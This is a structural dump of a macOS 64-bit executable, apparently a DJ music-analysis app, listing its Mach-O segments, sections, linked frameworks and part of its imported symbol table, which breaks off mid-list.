                                                                                                    Size:64-bit
                                                                                                    Architecture:x86_64
                                                                                                    Filetype:execute
                                                                                                    Nbr. of load commands:60
                                                                                                    Entry point:0x371D
                                                                                                    segment_command_64 aggregated: 4
                                                                                                    NameValue
                                                                                                    segname__PAGEZERO
                                                                                                    vmaddr0x0
                                                                                                    vmsize0x100000000
                                                                                                    fileoff0x0
                                                                                                    filesize0x0
                                                                                                    maxprot0x0
                                                                                                    initprot0x0
                                                                                                    nsects0
                                                                                                    flags0x0
                                                                                                    NameValue
                                                                                                    segname__TEXT
                                                                                                    vmaddr0x100000000
                                                                                                    vmsize0x170000
                                                                                                    fileoff0x0
                                                                                                    filesize0x170000
                                                                                                    maxprot0x7
                                                                                                    initprot0x5
                                                                                                    nsects19
                                                                                                    flags0x0
                                                                                                    Datas
                                                                                                    sectnamesegnameaddrsizeoffsetalignreloffnrelocflags
                                                                                                    __text__TEXT0x1000028F00x12F9E80x28F00x40x000x80000400
                                                                                                    __stubs__TEXT0x1001322D80x9A20x1322D80x10x000x80000408
                                                                                                    __stub_helper__TEXT0x100132C7C0x101E0x132C7C0x20x000x80000400
                                                                                                    __objc_methname__TEXT0x100133C9A0x1200D0x133C9A0x00x000x2
                                                                                                    __objc_classname__TEXT0x100145CA70xF810x145CA70x00x000x2
                                                                                                    __objc_methtype__TEXT0x100146C280x2F9A0x146C280x00x000x2
                                                                                                    __cstring__TEXT0x100149BD00x110830x149BD00x40x000x2
                                                                                                    __const__TEXT0x10015AC600x6CB00x15AC600x40x000x0
                                                                                                    __gcc_except_tab__TEXT0x1001619100x19840x1619100x20x000x0
                                                                                                    __swift3_typeref__TEXT0x1001632A00x3EE10x1632A00x40x000x0
                                                                                                    __swift3_assocty__TEXT0x1001671840x4F80x1671840x20x000x0
                                                                                                    __swift2_proto__TEXT0x1001676800x6B00x1676800x30x000x0
                                                                                                    __swift3_fieldmd__TEXT0x100167D300x16A80x167D300x20x000x0
                                                                                                    __swift3_builtin__TEXT0x1001693D80xC80x1693D80x20x000x0
                                                                                                    __swift3_reflstr__TEXT0x1001694A00x10680x1694A00x40x000x0
                                                                                                    __swift3_capture__TEXT0x10016A5080x5580x16A5080x20x000x0
                                                                                                    __ustring__TEXT0x10016AA600x440x16AA600x40x000x0
                                                                                                    __unwind_info__TEXT0x10016AAA40x3C640x16AAA40x20x000x0
                                                                                                    __eh_frame__TEXT0x10016E7080x18F00x16E7080x30x000x0
                                                                                                    NameValue
                                                                                                    segname__DATA
                                                                                                    vmaddr0x100170000
                                                                                                    vmsize0x52000
                                                                                                    fileoff0x170000
                                                                                                    filesize0x51000
                                                                                                    maxprot0x7
                                                                                                    initprot0x3
                                                                                                    nsects20
                                                                                                    flags0x0
                                                                                                    Datas
                                                                                                    sectnamesegnameaddrsizeoffsetalignreloffnrelocflags
                                                                                                    __nl_symbol_ptr__DATA0x1001700000x100x1700000x30x000x6
                                                                                                    __got__DATA0x1001700100x6A00x1700100x30x000x6
                                                                                                    __la_symbol_ptr__DATA0x1001706B00xCD80x1706B00x30x000x7
                                                                                                    __const__DATA0x1001713900x35A00x1713900x40x000x0
                                                                                                    __cfstring__DATA0x1001749300x80200x1749300x30x000x0
                                                                                                    __objc_classlist__DATA0x10017C9500x7600x17C9500x30x000x10000000
                                                                                                    __objc_nlclslist__DATA0x10017D0B00x80x17D0B00x30x000x10000000
                                                                                                    __objc_catlist__DATA0x10017D0B80x1500x17D0B80x30x000x10000000
                                                                                                    __objc_protolist__DATA0x10017D2080x1000x17D2080x30x000x0
                                                                                                    __objc_imageinfo__DATA0x10017D3080x80x17D3080x20x000x0
                                                                                                    __objc_const__DATA0x10017D3100x308F00x17D3100x30x000x0
                                                                                                    __objc_selrefs__DATA0x1001ADC000x4AD00x1ADC000x30x000x10000005
                                                                                                    __objc_protorefs__DATA0x1001B26D00x700x1B26D00x30x000x0
                                                                                                    __objc_classrefs__DATA0x1001B27400x7800x1B27400x30x000x10000000
                                                                                                    __objc_superrefs__DATA0x1001B2EC00x3100x1B2EC00x30x000x10000000
                                                                                                    __objc_ivar__DATA0x1001B31D00x10880x1B31D00x30x000x0
                                                                                                    __objc_data__DATA0x1001B42580x77D00x1B42580x30x000x0
                                                                                                    __data__DATA0x1001BBA280x50B80x1BBA280x30x000x0
                                                                                                    __bss__DATA0x1001C0AE00x8000x00x40x000x1
                                                                                                    __common__DATA0x1001C12E00x1C80x00x40x000x1
                                                                                                    NameValue
                                                                                                    segname__LINKEDIT
                                                                                                    vmaddr0x1001C2000
                                                                                                    vmsize0x23000
                                                                                                    fileoff0x1C1000
                                                                                                    filesize0x22610
                                                                                                    maxprot0x7
                                                                                                    initprot0x1
                                                                                                    nsects0
                                                                                                    flags0x0
                                                                                                    dyld_info_command aggregated: 1
                                                                                                    NameValue
                                                                                                    rebase_off1839104
                                                                                                    rebase_size9600
                                                                                                    bind_off1848704
                                                                                                    bind_size19184
                                                                                                    weak_bind_off0
                                                                                                    weak_bind_size0
                                                                                                    lazy_bind_off1867888
                                                                                                    lazy_bind_size16304
                                                                                                    export_off1884192
                                                                                                    export_size96
                                                                                                    symtab_command aggregated: 1
                                                                                                    NameValue
                                                                                                    symoff1892728
                                                                                                    nsyms856
                                                                                                    stroff1910568
                                                                                                    strsize26080
                                                                                                    dysymtab_command aggregated: 1
                                                                                                    NameValue
                                                                                                    ilocalsym0
                                                                                                    nlocalsym1
                                                                                                    iextdefsym1
                                                                                                    nextdefsym1
                                                                                                    iundefsym2
                                                                                                    nundefsym854
                                                                                                    tocoff0
                                                                                                    ntoc0
                                                                                                    modtaboff0
                                                                                                    nmodtab0
                                                                                                    extrefsymoff0
                                                                                                    nextrefsyms0
                                                                                                    indirectsymoff1906424
                                                                                                    nindirectsyms1036
                                                                                                    extreloff0
                                                                                                    nextrel0
                                                                                                    locreloff0
                                                                                                    nlocrel0
                                                                                                    dylinker_command aggregated: 1
                                                                                                    NameValue
                                                                                                    name12
                                                                                                    Datas/usr/lib/dyld
                                                                                                    uuid_command aggregated: 1
                                                                                                    NameValue
                                                                                                    uuidb'\xf1\x1b\xedUf\xae:\xdb\xb9\xbc\x1dC\xe7\x8e\xf4\t'
                                                                                                    version_min_command aggregated: 1
                                                                                                    NameValue
                                                                                                    version657664
                                                                                                    sdk658688
                                                                                                    source_version_command aggregated: 1
                                                                                                    NameValue
                                                                                                    version0
                                                                                                    entry_point_command aggregated: 1
                                                                                                    NameValue
                                                                                                    entryoff14109
                                                                                                    stacksize0
                                                                                                    dylib_command aggregated: 43
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version400.9.0
                                                                                                    compatibility_version1.0.0
                                                                                                    Datas/usr/lib/libc++.1.dylib
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version1.0.0
                                                                                                    compatibility_version1.0.0
                                                                                                    Datas@rpath/DanceabilityAudioEngine.framework/Versions/A/DanceabilityAudioEngine
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version877.0.0
                                                                                                    compatibility_version1.0.0
                                                                                                    Datas@loader_path/../Frameworks/MIKMIDI.framework/Versions/A/MIKMIDI
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version1452.23.0
                                                                                                    compatibility_version150.0.0
                                                                                                    Datas/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version1.0.0
                                                                                                    compatibility_version1.0.0
                                                                                                    Datas@rpath/MIKUpdate.framework/Versions/A/MIKUpdate
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version158.0.0
                                                                                                    compatibility_version2.0.0
                                                                                                    Datas/System/Library/Frameworks/Carbon.framework/Versions/A/Carbon
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version22.0.0
                                                                                                    compatibility_version1.0.0
                                                                                                    Datas/System/Library/Frameworks/Cocoa.framework/Versions/A/Cocoa
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version605.1.33
                                                                                                    compatibility_version1.0.0
                                                                                                    Datas/System/Library/Frameworks/WebKit.framework/Versions/A/WebKit
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version4.0.0
                                                                                                    compatibility_version1.0.0
                                                                                                    Datas/System/Library/Frameworks/Accelerate.framework/Versions/A/Accelerate
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version822.31.0
                                                                                                    compatibility_version1.0.0
                                                                                                    Datas/System/Library/Frameworks/CoreServices.framework/Versions/A/CoreServices
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version275.0.0
                                                                                                    compatibility_version1.0.0
                                                                                                    Datas/System/Library/Frameworks/IOKit.framework/Versions/A/IOKit
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version963.50.8
                                                                                                    compatibility_version1.0.0
                                                                                                    Datas/System/Library/Frameworks/SystemConfiguration.framework/Versions/A/SystemConfiguration
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version1.0.0
                                                                                                    compatibility_version1.0.0
                                                                                                    Datas/System/Library/Frameworks/AudioUnit.framework/Versions/A/AudioUnit
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version492.0.0
                                                                                                    compatibility_version1.0.0
                                                                                                    Datas/System/Library/Frameworks/AudioToolbox.framework/Versions/A/AudioToolbox
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version1.11.0
                                                                                                    compatibility_version1.2.0
                                                                                                    Datas/System/Library/Frameworks/QuartzCore.framework/Versions/A/QuartzCore
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version1.0.0
                                                                                                    compatibility_version1.0.0
                                                                                                    Datas@rpath/MIKTag.framework/Versions/A/MIKTag
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version1.0.0
                                                                                                    compatibility_version1.0.0
                                                                                                    Datas@loader_path/../Frameworks/MIKAnalysis.framework/Versions/A/MIKAnalysis
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version1.0.0
                                                                                                    compatibility_version1.0.0
                                                                                                    Datas@loader_path/../Frameworks/MIKData.framework/Versions/A/MIKData
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version1.0.0
                                                                                                    compatibility_version1.0.0
                                                                                                    Datas@rpath/MIKToolkit.framework/Versions/A/MIKToolkit
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version1.0.0
                                                                                                    compatibility_version1.0.0
                                                                                                    Datas/Library/Frameworks/iTunesLibrary.framework/iTunesLibrary
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version1452.23.0
                                                                                                    compatibility_version300.0.0
                                                                                                    Datas/System/Library/Frameworks/Foundation.framework/Versions/C/Foundation
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version228.0.0
                                                                                                    compatibility_version1.0.0
                                                                                                    Datas/usr/lib/libobjc.A.dylib
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version1252.50.4
                                                                                                    compatibility_version1.0.0
                                                                                                    Datas/usr/lib/libSystem.B.dylib
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version1561.40.112
                                                                                                    compatibility_version45.0.0
                                                                                                    Datas/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version851.0.0
                                                                                                    compatibility_version1.0.0
                                                                                                    Datas/System/Library/Frameworks/CoreData.framework/Versions/A/CoreData
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version1161.10.0
                                                                                                    compatibility_version64.0.0
                                                                                                    Datas/System/Library/Frameworks/CoreGraphics.framework/Versions/A/CoreGraphics
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version1.0.0
                                                                                                    compatibility_version1.0.0
                                                                                                    Datas/System/Library/Frameworks/CoreText.framework/Versions/A/CoreText
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version1.0.0
                                                                                                    compatibility_version1.0.0
                                                                                                    Datas@rpath/MIKAudio.framework/Versions/A/MIKAudio
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version902.0.54
                                                                                                    compatibility_version1.0.0
                                                                                                    Datas@rpath/libswiftAppKit.dylib
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version902.0.54
                                                                                                    compatibility_version1.0.0
                                                                                                    Datas@rpath/libswiftCore.dylib
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version902.0.54
                                                                                                    compatibility_version1.0.0
                                                                                                    Datas@rpath/libswiftCoreAudio.dylib
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version902.0.54
                                                                                                    compatibility_version1.0.0
                                                                                                    Datas@rpath/libswiftCoreData.dylib
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version902.0.54
                                                                                                    compatibility_version1.0.0
                                                                                                    Datas@rpath/libswiftCoreFoundation.dylib
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version902.0.54
                                                                                                    compatibility_version1.0.0
                                                                                                    Datas@rpath/libswiftCoreGraphics.dylib
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version902.0.54
                                                                                                    compatibility_version1.0.0
                                                                                                    Datas@rpath/libswiftCoreImage.dylib
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version902.0.54
                                                                                                    compatibility_version1.0.0
                                                                                                    Datas@rpath/libswiftDarwin.dylib
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version902.0.54
                                                                                                    compatibility_version1.0.0
                                                                                                    Datas@rpath/libswiftDispatch.dylib
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version902.0.54
                                                                                                    compatibility_version1.0.0
                                                                                                    Datas@rpath/libswiftFoundation.dylib
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version902.0.54
                                                                                                    compatibility_version1.0.0
                                                                                                    Datas@rpath/libswiftIOKit.dylib
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version902.0.54
                                                                                                    compatibility_version1.0.0
                                                                                                    Datas@rpath/libswiftMetal.dylib
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version902.0.54
                                                                                                    compatibility_version1.0.0
                                                                                                    Datas@rpath/libswiftObjectiveC.dylib
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version902.0.54
                                                                                                    compatibility_version1.0.0
                                                                                                    Datas@rpath/libswiftQuartzCore.dylib
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version902.0.54
                                                                                                    compatibility_version1.0.0
                                                                                                    Datas@rpath/libswiftXPC.dylib
                                                                                                    rpath_command aggregated: 2
                                                                                                    NameValue
                                                                                                    path12
                                                                                                    Datas@loader_path/../Frameworks/
                                                                                                    NameValue
                                                                                                    path12
                                                                                                    Datas@executable_path/../Frameworks
                                                                                                    linkedit_data_command aggregated: 3
                                                                                                    NameValue
                                                                                                    dataoff1884288
                                                                                                    datasize8216
                                                                                                    NameValue
                                                                                                    dataoff1892504
                                                                                                    datasize224
                                                                                                    NameValue
                                                                                                    dataoff1936656
                                                                                                    datasize43264
                                                                                                    Internal Symbols
                                                                                                    _AUGraphAddNode
                                                                                                    _AUGraphConnectNodeInput
                                                                                                    _AUGraphInitialize
                                                                                                    _AUGraphNodeInfo
                                                                                                    _AUGraphOpen
                                                                                                    _AUGraphStart
                                                                                                    _AudioUnitSetParameter
                                                                                                    _CFDataGetBytes
                                                                                                    _CFDictionaryCreateMutable
                                                                                                    _CFDictionarySetValue
                                                                                                    _CFRelease
                                                                                                    _CFRunLoopGetCurrent
                                                                                                    _CFStringCreateWithFormat
                                                                                                    _CFStringGetCStringPtr
                                                                                                    _CGAffineTransformIdentity
                                                                                                    _CGColorRelease
                                                                                                    _CGContextAddPath
                                                                                                    _CGContextFillPath
                                                                                                    _CGContextRestoreGState
                                                                                                    _CGContextRotateCTM
                                                                                                    _CGContextSaveGState
                                                                                                    _CGContextSetFillColorWithColor
                                                                                                    _CGContextSetShadowWithColor
                                                                                                    _CGContextSetShouldSmoothFonts
                                                                                                    _CGContextSetShouldSubpixelPositionFonts
                                                                                                    _CGContextSetShouldSubpixelQuantizeFonts
                                                                                                    _CGContextSetStrokeColorWithColor
                                                                                                    _CGContextSetTextDrawingMode
                                                                                                    _CGContextSetTextMatrix
                                                                                                    _CGContextSetTextPosition
                                                                                                    _CGContextStrokePath
                                                                                                    _CGContextTranslateCTM
                                                                                                    _CGPathAddLineToPoint
                                                                                                    _CGPathCreateMutable
                                                                                                    _CGPathMoveToPoint
                                                                                                    _CGPathRelease
                                                                                                    _CGPointZero
                                                                                                    _CGRectContainsPoint
                                                                                                    _CGRectEqualToRect
                                                                                                    _CGRectGetHeight
                                                                                                    _CGRectGetMaxX
                                                                                                    _CGRectGetMaxY
                                                                                                    _CGRectGetMidX
                                                                                                    _CGRectGetMidY
                                                                                                    _CGRectGetMinX
                                                                                                    _CGRectGetMinY
                                                                                                    _CGRectGetWidth
                                                                                                    _CGRectInset
                                                                                                    _CGRectIntersection
                                                                                                    _CGRectIntersectsRect
                                                                                                    _CGRectOffset
                                                                                                    _CGRectZero
                                                                                                    _CTFontCopyFontDescriptor
                                                                                                    _CTFontCreateWithFontDescriptor
                                                                                                    _CTFontDescriptorCreateCopyWithFeature
                                                                                                    _CTLineCreateWithAttributedString
                                                                                                    _CTLineDraw
                                                                                                    _GetCurrentKeyModifiers
                                                                                                    _GetVIPCode
                                                                                                    _IOIteratorNext
                                                                                                    _IOMasterPort
                                                                                                    _IOObjectRelease
                                                                                                    _IORegistryEntryCreateCFProperty
                                                                                                    _IORegistryEntryGetParentEntry
                                                                                                    _IORegistryEntrySearchCFProperty
                                                                                                    _IORegistryGetRootEntry
                                                                                                    _IOServiceGetMatchingServices
                                                                                                    _IOServiceMatching
                                                                                                    _LSFindApplicationForInfo
                                                                                                    _MDItemCopyAttribute
                                                                                                    _MDItemCreate
                                                                                                    _MIKAnalyticsRecentCrashDate
                                                                                                    _MIKAudioFileDispose
                                                                                                    _MIKAudioFileGetFileStreamFormat
                                                                                                    _MIKAudioFileGetLengthFrames
                                                                                                    _MIKAudioFileOpen
                                                                                                    _MIKAudioFilePrintError
                                                                                                    _MIKAudioFileRead
                                                                                                    _MIKAudioFileSetReadStreamFormat
                                                                                                    _MIKAudioSpectrumCopy
                                                                                                    _MIKAudioSpectrumCreate
                                                                                                    _MIKAudioSpectrumDispose
                                                                                                    _MIKCGColorCreateFromNSColor
                                                                                                    _MIKDataCollectionDidUpdateSongsNotification
                                                                                                    _MIKDataSongPasteboardType
                                                                                                    _MIKDatabaseDidDeleteSongNotification
                                                                                                    _MIKDatabaseMigrationDidFinishNotification
                                                                                                    _MIKDatabaseMigrationDidProgressNotification
                                                                                                    _MIKDatabaseMigrationProgressKey
                                                                                                    _MIKDatabaseMigrationWillBeginNotification
                                                                                                    _MIKDatabaseSongToDeleteKey
                                                                                                    _MIKDatabaseWillDeleteSongNotification
                                                                                                    _MIKDetectCuePointInfo
                                                                                                    _MIKEnergeticAdjustBeatmarks
                                                                                                    _MIKExtAudioFileGetBitrate
                                                                                                    _MIKFLACAudioFileGetDuration
                                                                                                    _MIKFeedbackAppName
                                                                                                    _MIKFeedbackProduct
                                                                                                    _MIKFeedbackVersion
                                                                                                    _MIKIndexForCamelotKey
                                                                                                    _MIKIndexForKey
                                                                                                    _MIKIsEnergyString
                                                                                                    _MIKIsEnergyString1
                                                                                                    _MIKIsKeyString
                                                                                                    _MIKIsTempoString
                                                                                                    _MIKKeyNames
                                                                                                    _MIKKeyString
                                                                                                    _MIKKeysString
                                                                                                    _MIKMIDIDeviceKey
                                                                                                    _MIKMIDIDeviceWasAddedNotification
                                                                                                    _MIKMIDIDeviceWasRemovedNotification
                                                                                                    _MIKMIDIEndpointKey
                                                                                                    _MIKMIDIVirtualEndpointWasAddedNotification
                                                                                                    _MIKMIDIVirtualEndpointWasRemovedNotification
                                                                                                    _MIKMajorIndexForCamelotKey
                                                                                                    _MIKMinorIndexForCamelotKey
                                                                                                    _MIKNewsServiceDidUpdateNotificationName
                                                                                                    _MIKRekordboxQueueProgressChangedNotification
                                                                                                    _MIKServicePlatformKey
                                                                                                    _MIKServiceProductNameKey
                                                                                                    _MIKServiceProductVersionKey
                                                                                                    _MIKServiceVIPCodeKey
                                                                                                    _MIKTagArtistFromPath
                                                                                                    _MIKTagErrorDomain
                                                                                                    _MIKTagImageDictionaryImageKey
                                                                                                    _MIKTagNameFromPath
                                                                                                    _MIKTraktorQueueProgressChangedNotification
                                                                                                    _MIKUpdateNotification
                                                                                                    _NSApp
                                                                                                    _NSAppKitVersionNumber
                                                                                                    _NSApplicationDidBecomeActiveNotification
                                                                                                    _NSApplicationDidFinishLaunchingNotification
                                                                                                    _NSApplicationMain
                                                                                                    _NSApplicationWillTerminateNotification
                                                                                                    _NSBackgroundColorAttributeName
                                                                                                    _NSBaselineOffsetAttributeName
                                                                                                    _NSBeep
                                                                                                    _NSCalibratedRGBColorSpace
                                                                                                    _NSClassFromString
                                                                                                    _NSCocoaErrorDomain
                                                                                                    _NSDefaultRunLoopMode
                                                                                                    _NSDeletedObjectsKey
                                                                                                    _NSDivideRect
                                                                                                    _NSEqualRects
                                                                                                    _NSEqualSizes
                                                                                                    _NSEventTrackingRunLoopMode
                                                                                                    _NSFileModificationDate
                                                                                                    _NSFilePathErrorKey
                                                                                                    _NSFileTypeForHFSTypeCode
                                                                                                    _NSFilenamesPboardType
                                                                                                    _NSFontAttributeName
                                                                                                    _NSForegroundColorAttributeName
                                                                                                    _NSFrameRect
                                                                                                    _NSFrameRectWithWidthUsingOperation
                                                                                                    _NSInsetRect
                                                                                                    _NSIntegralRect
                                                                                                    _NSInternalInconsistencyException
                                                                                                    _NSIntersectionRect
                                                                                                    _NSIntersectsRect
                                                                                                    _NSIsEmptyRect
                                                                                                    _NSKeyValueChangeNewKey
                                                                                                    _NSKeyValueChangeOldKey
                                                                                                    _NSLocalizedDescriptionKey
                                                                                                    _NSLocalizedFailureReasonErrorKey
                                                                                                    _NSLocalizedRecoveryOptionsErrorKey
                                                                                                    _NSLog
                                                                                                    _NSManagedObjectContextObjectsDidChangeNotification
                                                                                                    _NSModalPanelRunLoopMode
                                                                                                    _NSMouseInRect
                                                                                                    _NSNoSelectionMarker
                                                                                                    _NSNoSelectionPlaceholderBindingOption
                                                                                                    _NSObjectInaccessibleException
                                                                                                    _NSOffsetRect
                                                                                                    _NSParagraphStyleAttributeName
                                                                                                    _NSPasteboardTypeString
                                                                                                    _NSPasteboardTypeTIFF
                                                                                                    _NSPasteboardURLReadingFileURLsOnlyKey
                                                                                                    _NSPointInRect
                                                                                                    _NSRecoveryAttempterErrorKey
                                                                                                    _NSRectFill
                                                                                                    _NSRectFillUsingOperation
                                                                                                    _NSRunLoopCommonModes
                                                                                                    _NSScrollViewDidLiveScrollNotification
                                                                                                    _NSSearchPathForDirectoriesInDomains
                                                                                                    _NSSelectorFromString
                                                                                                    _NSShadowAttributeName
                                                                                                    _NSStringFromSelector
                                                                                                    _NSTableViewSelectionDidChangeNotification
                                                                                                    _NSURLIsDirectoryKey
                                                                                                    _NSURLPathKey
                                                                                                    _NSURLPboardType
                                                                                                    _NSUnderlineStyleAttributeName
                                                                                                    _NSUnderlyingErrorKey
                                                                                                    _NSUnionRect
                                                                                                    _NSViewBoundsDidChangeNotification
                                                                                                    _NSViewFrameDidChangeNotification
                                                                                                    _NSViewNoInstrinsicMetric
                                                                                                    _NSWindowDidEnterFullScreenNotification
                                                                                                    _NSWindowDidExitFullScreenNotification
                                                                                                    _NSZeroPoint
                                                                                                    _NSZeroRect
                                                                                                    _NSZeroSize
                                                                                                    _NewAUGraph
                                                                                                    _OBJC_CLASS_$_CABasicAnimation
                                                                                                    _OBJC_CLASS_$_CALayer
                                                                                                    _OBJC_CLASS_$_CAShapeLayer
                                                                                                    _OBJC_CLASS_$_CATransaction
                                                                                                    _OBJC_CLASS_$_ITLibrary
                                                                                                    _OBJC_CLASS_$_MIKAnalysisCuePoint
                                                                                                    _OBJC_CLASS_$_MIKAnalysisSegment
                                                                                                    _OBJC_CLASS_$_MIKAudioFilePlayer
                                                                                                    _OBJC_CLASS_$_MIKBeatAnalyzer
                                                                                                    _OBJC_CLASS_$_MIKButton
                                                                                                    _OBJC_CLASS_$_MIKButtonCell
                                                                                                    _OBJC_CLASS_$_MIKCrashMonitor
                                                                                                    _OBJC_CLASS_$_MIKCrashReport
                                                                                                    _OBJC_CLASS_$_MIKDataCollection
                                                                                                    _OBJC_CLASS_$_MIKDataCuePoint
                                                                                                    _OBJC_CLASS_$_MIKDataRecentsCollection
                                                                                                    _OBJC_CLASS_$_MIKDataSmartCollection
                                                                                                    _OBJC_CLASS_$_MIKDataSong
                                                                                                    _OBJC_CLASS_$_MIKDataSongEnergySegment
                                                                                                    _OBJC_CLASS_$_MIKDataSongKeySegment
                                                                                                    _OBJC_CLASS_$_MIKDatabase
                                                                                                    _OBJC_CLASS_$_MIKEULAController
                                                                                                    _OBJC_CLASS_$_MIKEnergyAnalyzer
                                                                                                    _OBJC_CLASS_$_MIKEnergySegment
                                                                                                    _OBJC_CLASS_$_MIKExternalScroller
                                                                                                    _OBJC_CLASS_$_MIKFeedbackController
                                                                                                    _OBJC_CLASS_$_MIKGoogleAnalyticsClient
                                                                                                    _OBJC_CLASS_$_MIKInterleavedSongFileData
                                                                                                    _OBJC_CLASS_$_MIKLayerBackedScrollView
                                                                                                    _OBJC_CLASS_$_MIKLoader
                                                                                                    _OBJC_CLASS_$_MIKMIDIDevice
                                                                                                    _OBJC_CLASS_$_MIKMIDIDeviceManager
                                                                                                    _OBJC_CLASS_$_MIKMIDISynthesizer
                                                                                                    _OBJC_CLASS_$_MIKMutableMIDINoteOffCommand
                                                                                                    _OBJC_CLASS_$_MIKMutableMIDINoteOnCommand
                                                                                                    _OBJC_CLASS_$_MIKNewKeyAnalyzer
                                                                                                    _OBJC_CLASS_$_MIKNewWaveformAnalyzer
                                                                                                    _OBJC_CLASS_$_MIKNewsServiceClient
                                                                                                    _OBJC_CLASS_$_MIKRekordboxDatabase
                                                                                                    _OBJC_CLASS_$_MIKRekordboxQueue
                                                                                                    _OBJC_CLASS_$_MIKTag
                                                                                                    _OBJC_CLASS_$_MIKTagBeatGrid
                                                                                                    _OBJC_CLASS_$_MIKTagComment
                                                                                                    _OBJC_CLASS_$_MIKTagCuePoint
                                                                                                    _OBJC_CLASS_$_MIKTagCuePoints
                                                                                                    _OBJC_CLASS_$_MIKTagEnergy
                                                                                                    _OBJC_CLASS_$_MIKTagKey
                                                                                                    _OBJC_CLASS_$_MIKTiledLayer
                                                                                                    _OBJC_CLASS_$_MIKTimeEnergyPair
                                                                                                    _OBJC_CLASS_$_MIKTraktorDatabase
                                                                                                    _OBJC_CLASS_$_MIKTraktorQueue
                                                                                                    _OBJC_CLASS_$_MIKUpdateManager
                                                                                                    _OBJC_CLASS_$_MIKViewController
                                                                                                    _OBJC_CLASS_$_MIKVolumeAnalyzer
                                                                                                    _OBJC_CLASS_$_MIKWaveformAnalyzer
                                                                                                    _OBJC_CLASS_$_MIKWaveformCache
                                                                                                    _OBJC_CLASS_$_MIKWebServiceClient
                                                                                                    _OBJC_CLASS_$_NSAffineTransform
                                                                                                    _OBJC_CLASS_$_NSAlert
                                                                                                    _OBJC_CLASS_$_NSAnimationContext
                                                                                                    _OBJC_CLASS_$_NSArray
